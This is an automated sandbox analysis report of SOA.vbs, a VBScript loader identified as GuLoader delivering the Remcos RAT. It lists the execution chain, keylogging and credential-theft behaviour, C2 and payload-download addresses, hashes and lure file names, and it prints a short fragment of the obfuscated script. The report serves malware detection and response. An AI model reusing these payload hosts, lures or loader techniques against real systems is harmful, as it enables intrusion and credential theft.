                Credential Access: OS Credential Dumping [1]; Input Capture [11]; Credentials in Registry [2]; Credentials In Files [1]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [129]; Security Software Discovery [141]; Virtualization/Sandbox Evasion [31]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [11]; Clipboard Data [2]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [112]; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1465863, Sample: SOA.vbs, Start date: 02/07/2024, Architecture: WINDOWS, Score: 100
                Sample-level: DNS geoplugin.net; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected GuLoader; 10 other signatures
                wscript.exe
                    Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
                    powershell.exe
                        Network: 103.237.86.247, 49700, 49707, 80, BGNR-AP2BainandCompanySG, unknown
                        Signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                        powershell.exe
                            Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                            wab.exe
                                Network: 103.237.87.32, 1999, 49708, 49709, BGNR-AP2BainandCompanySG, unknown; geoplugin.net 178.237.33.50, 49710, 80, ATOM86-ASATOM86NL, Netherlands
                                Dropped: C:\ProgramData\remcos\logs.dat, data
                                Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
                                wab.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                                wab.exe: Tries to harvest and steal browser information (history, passwords, etc)
                                wab.exe
                                2 other processes
                            cmd.exe
                        conhost.exe
                        cmd.exe

                Source | Detection | Scanner | Label | Link
                SOA.vbs | 0% | ReversingLabs
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://103.237.86.247/Teentsier.lpk0%Avira URL Cloudsafe
                http://103.230%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.l0%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://103.237.86.247/mbLXhRfFSSN77.bin | false | Avira URL Cloud: safe | unknown
103.237.87.32 | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://103.237.86.247/Teentsier.lpk | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
103.237.86.247 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | false
103.237.87.32 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465863
Start date and time: 2024-07-02 07:49:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SOA.vbs
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winVBS@22/13@1/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 174
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .vbs
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 720 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7368 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:50:02 | API Interceptor | 1x Sleep call for process: wscript.exe modified
01:50:04 | API Interceptor | 124x Sleep call for process: powershell.exe modified
03:37:28 | API Interceptor | 681402x Sleep call for process: wab.exe modified
Match: 178.237.33.50
Associated Sample Name / URL | Detection | Threat Name | Context
SOA.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | geoplugin.net/json.gp
HUED23EDE5UGRFQ.exe | malicious | Remcos | geoplugin.net/json.gp
DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
tWitaq427K.exe | malicious | Remcos, AgentTesla | geoplugin.net/json.gp
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
Offer ZI-0428.doc | malicious | Remcos | geoplugin.net/json.gp
cKiTq7RRCn.exe | malicious | Remcos | geoplugin.net/json.gp
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
Match: geoplugin.net
Associated Sample Name / URL | Detection | Threat Name | Context
SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
Match: BGNR-AP2BainandCompanySG
Associated Sample Name / URL | Detection | Threat Name | Context
SOA.vbs | malicious | Remcos, GuLoader | 103.237.86.247
Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 103.237.86.247
Payment Copy.vbs | malicious | Remcos, GuLoader | 103.237.86.247
YHZb2CeJdY.elf | malicious | Mirai, Okiru | 103.237.87.90
lVlJfRiCLE.elf | malicious | Mirai, Okiru | 103.237.87.90
TKX7tZs372.elf | malicious | Mirai, Okiru | 103.237.87.90
3B3W5byB4W.elf | malicious | Mirai, Okiru | 103.237.87.90
jkeqHGu4is.elf | malicious | Mirai, Okiru | 103.237.87.90
teb6nb8nmu.elf | malicious | Mirai, Okiru | 103.237.87.90
n7h2Ze4ezf.elf | malicious | Mirai | 103.237.86.195
Match: ATOM86-ASATOM86NL
Associated Sample Name / URL | Detection | Threat Name | Context
SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
                    No context
                    No context
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.379519383183141
Encrypted: false
SSDEEP: 3:rhlKlVH5lkQ55JWRal2Jl+7R0DAlBG45klovDl6v:6lVbR55YcIeeDAlOWAv
MD5: 633B8C81F01D10690635234DB150AC83
SHA1: E3941559026D4AA0BC12C578AADEB375A2FD1AEB
SHA-256: 5B5C466E099272EA43406DFD6178B83ACA533AD64379D557A3EBD1B662CB818B
SHA-512: 16D90983FB3480B7846988411C4D26C410FE7EFDEBCDBC293143F063B1A091280FF5F365A5D9BC21C5C3EE3B94BFCADE0DFBED0E782BE015F67452BDEE5D756A
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.0.7./.0.2. .0.3.:.3.6.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Windows\System32\wscript.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Process: C:\Windows\System32\wscript.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.137989037915285
Encrypted: false
SSDEEP: 6:kK/asF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3kDnLNkPlE99SNxAhUe/3
MD5: 77E54BC9F789026CEBD16779DE51FE48
SHA1: 53B0C980EAC78B9D23CFE7D53E3DFB9BB4A14BDF
SHA-256: 6AD7A9EAF66F2AF46BD1066956AE37093C466968CF0349E0CDA6FFE19A718ED2
SHA-512: 6480071EB9FC6BB943E04566E06E19887716755CA9F45B1B97E7405364A795057F9BBCAF8F1537608F8EC1E0C28ED9248445C5DE577D7E0DFBB9ECB93F19C89D
Malicious: false
Preview: p...... ........Z.^.C...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
Preview:
{
  "geoplugin_request":"8.46.123.33",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.8908305915084105
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5: DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1: 326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256: 383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512: B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious: false
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulJnp/p:NllU
MD5: BC6DB77EB243BF62DC31267706650173
SHA1: 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256: 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512: 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious: false
Preview: @...e.................................X..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x50401aeb, page size 32768, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):14680064
                    Entropy (8bit):0.97750649353834
                    Encrypted:false
                    SSDEEP:6144:IgMXQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:pn/cj5tND5ApBK4K
                    MD5:2079496977177C147204CACEF136B3DB
                    SHA1:F87E891347F846ACDDA1B8D85F2D47A3F0686F52
                    SHA-256:283FC2386D50CDA505FC8C7D208E54CBCD4907C8762975A79E530FA5836D6588
                    SHA-512:7DAC292A1BCEDABF19C35754B264ED750956B5B64351D8E727A8A98FE4E8EF71CE610D64EAC6108272FB8BD4AF40E6A5542727CA25134F8333950CD288882E70
                    Malicious:false
                    Preview:P@..... ................./..(...{........................&..... 6...{5.3$...|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{..................................%6e.3$...|..................M...3$...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:modified
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):459660
                    Entropy (8bit):5.865092790583514
                    Encrypted:false
                    SSDEEP:6144:nSOolg4G+jEF3SPY/GPlbcSlJvB1egqBbKM1WJdDgZY9S7/jAv9i8bIT/UNAtmf:Sflg4LQF3SDRXz1erWM1E8XIiKAs
                    MD5:334F9B5F169FF2F2587CE0EFF7767B08
                    SHA1:30B561B8BDBBF0F0133897A22F5E603D3175CE23
                    SHA-256:F2265BC03EF563EDE08C5EAB67B27F147C1635CC85D17F41BF53C615BDF8D650
                    SHA-512:E0FC0E68BD85730F37009386B58A664A976C8CCC93D5CCD44CA32737A8EB92B530341C3674A1CCFD6E5FB340754FE98DDC3396021BB0D1822D23A77223408332
                    Malicious:false
                    File type:ASCII text, with CRLF line terminators
                    Entropy (8bit):5.37400819354661
                    TrID:
                    • Visual Basic Script (13500/0) 100.00%
                    File name:SOA.vbs
                    File size:26'335 bytes
                    MD5:5eb7f6fdbef3c0d5203a8a04a09f2b39
                    SHA1:6931cbc28345d13ca66694f5059c05d4f8889f73
                    SHA256:9bb93f41ee5ed09fe6ad9c7c150dbc06280ee08f746d9a1ac9da501d7ad53c9e
                    SHA512:fb321daa951f1aa535e42400ae0eb3eb3edf6b0b612e942c1546031ec9e2bda5f8975f91701f02d752e1081e3df12f4118fc78e0498a215aba00cee95e46e1bb
                    SSDEEP:384:27HI3TA6FM4YAeylXIOwdc+FKneZ+rdu2PtaP8BrP/NeLEmG:fTMo6F2lnn0WhBrPVeQr
                    TLSH:91C20DE01D010FB869B73B75E94D3EA460B0AEB70F3BB833395C6228740566F3D99596
                    File Content Preview:
                    Rapsoderreptatorystet203="Defaitistiske"
                    Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)
                    Diftongerer = interpretability
                    Set Deklarationspligterne = CreateObject("WScript.Shell")
                    Call Udtagelseskampes("cls;write 'Knyttelv
                    Icon Hash:68d69b8f86ab9a86
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 2, 2024 07:50:08.913146019 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913149118 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913160086 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913170099 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913172960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913192034 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913270950 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913525105 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913564920 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913577080 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913593054 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913660049 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913722038 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913733006 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913744926 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913755894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913779020 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913839102 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914026022 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914037943 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914048910 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914061069 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914072037 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914081097 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914083958 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914094925 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914103985 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914118052 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.917800903 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.917851925 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.917862892 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.917891026 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.917992115 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918003082 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918014050 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918020010 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918135881 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918148041 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918158054 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918160915 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918169975 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918184996 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918287992 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918458939 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918469906 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918482065 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918493986 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918505907 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918505907 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918517113 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918533087 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918608904 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918698072 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918709993 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918720007 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918731928 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918750048 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918755054 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918761015 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918771982 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918772936 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.918781996 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.918783903 CEST8049700103.237.86.247192.168.2.7
